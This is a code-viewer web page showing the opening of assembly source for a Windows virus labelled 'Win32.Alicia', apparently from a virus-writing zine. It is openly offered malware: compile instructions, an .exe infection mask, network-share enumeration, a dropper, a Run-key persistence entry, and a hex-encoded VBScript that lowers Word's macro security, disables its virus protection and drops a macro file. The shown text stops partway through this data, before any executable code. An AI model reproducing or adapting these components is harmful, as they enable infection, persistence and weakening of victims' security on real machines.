📄 29a-7.018
字号:
;Win32.Alicia
;(c) by Necronomikon/ZeroGravity
;****************************
; COMPILATION:
; tasm32 /ml /m3 alicia.asm,,;
; tlink32 /Tpe /aa /c /v alicia.obj,,, import32.lib,
;
.386
.model flat
locals
.DATA
signature db '***Win32.Alicia***',13, 10
db '(c) by Necronomikon/ZeroGravity',0
;#######################
handle1 db 50 dup(0)
handle2 db 50 dup(0)
maska db '*.exe',0
zgrext db 'luv.',0
handle_ dd 0
_handle dd 0
filedta:
FileAttributes dd 0
CreationTime db 8 dup(0)
LastAccessTime db 8 dup(0)
LastWriteTime db 8 dup(0)
nFileSizeHigh dd 0
nFileSizeLow dd 0
dwReserved0 dd 0
dwReserved1 dd 0
nFileName db 50 dup('N')
nAltFileName db 14 dup(0)
newfilename db 50 dup(0)
path2 db 25 dup(0)
path3 db 260 dup(0)
_off_ dd 0
Net_Struc_Count DD 1
Enum_Buf_Size DD 666
Enum_Buffer DB 666 DUP(0)
Enum_Handle DD 0
Own_Path DB 260 DUP(0)
Remote_Drive DB 'T:', 0
Remote_Trojan DB 'T:'
MsDos_Sys DB 'T:\MSDOS.SYS', 0
Win_Dir DB 260 DUP(0)
Win_Dir_Key DB 'WinDir', 0
Win_Ini_Run_Key DB 'run', 0
Windows_Section DB 'windows', 0
Paths_Section DB 'Paths', 0
Root_Dropper DB '\nwvf.exe', 0
Slash_Win_Ini DB '\'
Default_String DB 0
RESOURCEUSAGE_CONTAINER EQU 00000002h
RESOURCETYPE_DISK EQU 00000001h
RESOURCE_GLOBALNET EQU 00000002h
FILE_ATTRIBUTE_HIDDEN EQU 2
NetBios_Remote DB '\\666.666.666.666', 0
Net_Resource_Struc:
DD 0
DD 0
DD 0
DD 0
DD 0
DD OFFSET NetBios_Remote
DD 0
DD 0
Net_Resource: DD 0
DD 0
DD 0
Net_Usage DD 0
Net_Local_Name DD 0
Net_Remote_Name DD 0
DD 0
DD 0
include useful.inc
;###########################
copybuf db 50 dup(0)
copyhnd db 50 dup(0)
vbs_handle dd ?
vbsdropper db 'c:\system.vbs', 0
szvbs db 220 dup (0)
doc_handle dd ?
docdropper db 'c:\alicia.doc', 0
szdoc db 220 dup (0)
REG_SZ equ 1
HKEY_LOCAL_MACHINE = 80000002h
KEY_ALL_ACCESS = 001F0000h
REG_DWORD = 00000004h
value_name DB "Alicia",0
subkey DB "Software\Microsoft\Windows\CurrentVersion\Run",0
disposition DD ?
new_value DB "c:\system.vbs",0
reghandle DD ?
;doc injector
;*************
sys_ DB 04FH,06EH,020H,045H,072H,072H,06FH,072H,020H,052H,065H,073H,075H,06DH
DB 065H,020H,04EH,065H,078H,074H,00DH,00AH,027H,057H,069H,06EH,033H,032H,02FH
DB 057H,06FH,072H,064H,039H,037H,02EH,041H,06CH,069H,063H,069H,061H,00DH,00AH
DB 027H,028H,063H,029H,062H,079H,020H,04EH,065H,063H,072H,06FH,06EH,06FH,06DH
DB 069H,06BH,06FH,06EH,02FH,05AH,065H,072H,030H,047H,072H,061H,076H,069H,074H
DB 079H,00DH,00AH,053H,065H,074H,020H,066H,073H,06FH,020H,03DH,020H,043H,072H
DB 065H,061H,074H,065H,04FH,062H,06AH,065H,063H,074H,028H,022H,053H,063H,072H
DB 069H,070H,074H,069H,06EH,067H,02EH,046H,069H,06CH,065H,053H,079H,073H,074H
DB 065H,06DH,04FH,062H,06AH,065H,063H,074H,022H,029H,00DH,00AH,053H,065H,074H
DB 020H,057H,069H,06EH,044H,069H,072H,020H,03DH,020H,066H,073H,06FH,02EH,047H
DB 065H,074H,053H,070H,065H,063H,069H,061H,06CH,046H,06FH,06CH,064H,065H,072H
DB 028H,030H,029H,00DH,00AH,053H,065H,074H,020H,057H,053H,048H,053H,068H,065H
DB 06CH,06CH,020H,03DH,020H,057H,053H,063H,072H,069H,070H,074H,02EH,043H,072H
DB 065H,061H,074H,065H,04FH,062H,06AH,065H,063H,074H,028H,022H,057H,053H,063H
DB 072H,069H,070H,074H,02EH,053H,068H,065H,06CH,06CH,022H,029H,00DH,00AH,057H
DB 053H,048H,053H,068H,065H,06CH,06CH,02EH,052H,065H,067H,057H,072H,069H,074H
DB 065H,020H,022H,048H,04BH,045H,059H,05FH,043H,055H,052H,052H,045H,04EH,054H
DB 05FH,055H,053H,045H,052H,05CH,053H,06FH,066H,074H,077H,061H,072H,065H,05CH
DB 04DH,069H,063H,072H,06FH,073H,06FH,066H,074H,05CH,04FH,066H,066H,069H,063H
DB 065H,05CH,031H,030H,02EH,030H,05CH,057H,06FH,072H,064H,05CH,053H,065H,063H
DB 075H,072H,069H,074H,079H,05CH,041H,063H,063H,065H,073H,073H,056H,042H,04FH
DB 04DH,022H,02CH,020H,031H,02CH,020H,022H,052H,045H,047H,05FH,044H,057H,04FH
DB 052H,044H,022H,00DH,00AH,057H,053H,048H,053H,068H,065H,06CH,06CH,02EH,052H
DB 065H,067H,057H,072H,069H,074H,065H,020H,022H,048H,04BH,045H,059H,05FH,043H
DB 055H,052H,052H,045H,04EH,054H,05FH,055H,053H,045H,052H,05CH,053H,06FH,066H
DB 074H,077H,061H,072H,065H,05CH,04DH,069H,063H,072H,06FH,073H,06FH,066H,074H
DB 05CH,04FH,066H,066H,069H,063H,065H,05CH,031H,030H,02EH,030H,05CH,057H,06FH
DB 072H,064H,05CH,053H,065H,063H,075H,072H,069H,074H,079H,05CH,04CH,065H,076H
DB 065H,06CH,022H,02CH,020H,031H,02CH,020H,022H,052H,045H,047H,05FH,044H,057H
DB 04FH,052H,044H,022H,00DH,00AH,057H,053H,048H,053H,068H,065H,06CH,06CH,02EH
DB 052H,065H,067H,057H,072H,069H,074H,065H,020H,022H,048H,04BH,045H,059H,05FH
DB 043H,055H,052H,052H,045H,04EH,054H,05FH,055H,053H,045H,052H,05CH,053H,06FH
DB 066H,074H,077H,061H,072H,065H,05CH,04DH,069H,063H,072H,06FH,073H,06FH,066H
DB 074H,05CH,04FH,066H,066H,069H,063H,065H,05CH,039H,02EH,030H,05CH,057H,06FH
DB 072H,064H,05CH,053H,065H,063H,075H,072H,069H,074H,079H,05CH,04CH,065H,076H
DB 065H,06CH,022H,02CH,020H,031H,02CH,020H,022H,052H,045H,047H,05FH,044H,057H
DB 04FH,052H,044H,022H,00DH,00AH,053H,065H,074H,020H,042H,061H,063H,06BH,075H
DB 070H,020H,03DH,020H,057H,053H,063H,072H,069H,070H,074H,02EH,043H,072H,065H
DB 061H,074H,065H,04FH,062H,06AH,065H,063H,074H,028H,022H,057H,06FH,072H,064H
DB 02EH,041H,070H,070H,06CH,069H,063H,061H,074H,069H,06FH,06EH,022H,029H,00DH
DB 00AH,042H,061H,063H,06BH,075H,070H,02EH,04FH,070H,074H,069H,06FH,06EH,073H
DB 02EH,056H,069H,072H,075H,073H,050H,072H,06FH,074H,065H,063H,074H,069H,06FH
DB 06EH,020H,03DH,020H,028H,052H,06EH,064H,020H,02AH,020H,030H,029H,00DH,00AH
DB 042H,061H,063H,06BH,075H,070H,02EH,04FH,070H,074H,069H,06FH,06EH,073H,02EH
DB 053H,061H,076H,065H,04EH,06FH,072H,06DH,061H,06CH,050H,072H,06FH,06DH,070H
DB 074H,020H,03DH,020H,028H,052H,06EH,064H,020H,02AH,020H,030H,029H,00DH,00AH
DB 053H,065H,074H,020H,062H,061H,062H,065H,020H,03DH,020H,066H,073H,06FH,02EH
DB 04FH,070H,065H,06EH,054H,065H,078H,074H,046H,069H,06CH,065H,028H,057H,053H
DB 063H,072H,069H,070H,074H,02EH,053H,063H,072H,069H,070H,074H,046H,075H,06CH
DB 06CH,04EH,061H,06DH,065H,02CH,020H,031H,029H,00DH,00AH,053H,063H,072H,069H
DB 070H,074H,052H,065H,061H,064H,031H,036H,020H,03DH,020H,062H,061H,062H,065H
DB 02EH,052H,065H,061H,064H,041H,06CH,06CH,00DH,00AH,062H,061H,062H,065H,02EH
DB 043H,06CH,06FH,073H,065H,00DH,00AH,00DH,00AH,053H,065H,074H,020H,044H,072H
DB 06FH,070H,046H,069H,06CH,065H,020H,03DH,020H,046H,053H,04FH,02EH,043H,072H
DB 065H,061H,074H,065H,054H,065H,078H,074H,046H,069H,06CH,065H,028H,022H,063H
DB 03AH,05CH,073H,079H,073H,031H,02EH,064H,072H,030H,022H,02CH,020H,054H,072H
DB 075H,065H,029H,00DH,00AH,044H,072H,06FH,070H,046H,069H,06CH,065H,02EH,057H
DB 072H,069H,074H,065H,04CH,069H,06EH,065H,020H,022H,053H,075H,062H,020H,041H
DB 075H,074H,06FH,04FH,070H,065H,06EH,028H,029H,022H,00DH,00AH,044H,072H,06FH
DB 070H,046H,069H,06CH,065H,02EH,057H,072H,069H,074H,065H,04CH,069H,06EH,065H
DB 020H,022H,04FH,06EH,020H,045H,072H,072H,06FH,072H,020H,052H,065H,073H,075H
DB 06DH,065H,020H,04EH,065H,078H,074H,022H,00DH,00AH,044H,072H,06FH,070H,046H
DB 069H,06CH,065H,02EH,057H,072H,069H,074H,065H,04CH,069H,06EH,065H,020H,022H
DB 044H,069H,06DH,020H,06EH,065H,063H,028H,029H,020H,041H,073H,020H,042H,079H
DB 074H,065H,022H,00DH,00AH,044H,072H,06FH,070H,046H,069H,06CH,065H,02EH,057H
DB 072H,069H,074H,065H,04CH,069H,06EH,065H,020H,022H,072H,065H,06DH,020H,057H
DB 069H,06EH,033H,032H,02FH,057H,04DH,039H,037H,02EH,041H,06CH,069H,063H,069H
DB 061H,022H,00DH,00AH,044H,072H,06FH,070H,046H,069H,06CH,065H,02EH,057H,072H
DB 069H,074H,065H,04CH,069H,06EH,065H,020H,022H,072H,065H,06DH,020H,028H,063H
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -